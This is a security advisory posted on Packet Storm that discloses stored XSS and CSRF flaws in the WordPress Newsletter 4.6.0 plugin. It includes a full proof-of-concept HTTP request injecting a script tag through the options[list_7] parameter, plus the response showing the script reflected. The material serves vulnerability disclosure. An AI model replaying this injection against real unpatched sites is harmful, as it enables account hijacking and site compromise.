Exploit the possiblities

WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting

WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting
Posted Oct 13, 2016
Authored by Keith Lee

WordPress Newsletter plugin version 4.6.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | 6cc120dc6ca72ce24477e8b469a32dba

WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
Hello,
Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is
vulnerable to CSRF and XSS.
The issue is supposed to be fixed in version 4.6.1 . See
https://wordpress.org/plugins/newsletter/changelog/ for more details.


1. Stored Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF
protection).

*Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
*Method: *POST
*Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_users_massive
*Vulnerable Parameter(s): *
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]

*Example Attack:*
*Request:*
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762

act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%
2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=
test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%
5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&
options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%
5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%
5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_
checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%
5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&
options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&
options%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<%
2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_
7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%
5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&
options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&
options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%
5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%
5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&
options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%
5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%
5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&
options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%
5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%
5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&
options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%
5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%
5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&
options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%
5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%
5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&
options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%
5Blist_20_checked%5D=0

*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536

*Request:*
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: http://localhost:8888/wordpress/wp-admin/admin.php?
page=newsletter_users_massive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989

For preference <select id="options-list" name="options[list]"><option
value="1">(1) test</option><option value="2">(2) </option><option
value="3">(3) </option><option value="4">(4) </option><option value="5">(5)
</option><option value="6">(6) </option><option value="7">(7)
bi1x5<script>alert('spiderlabs')</script>gjoce</option><option
value="8">(8)

*Vulnerable PHP Code*
/newsletter/subscription/lists.php:51,52
/users/massive.php

--
Regards,
Keith Lee

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    28 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close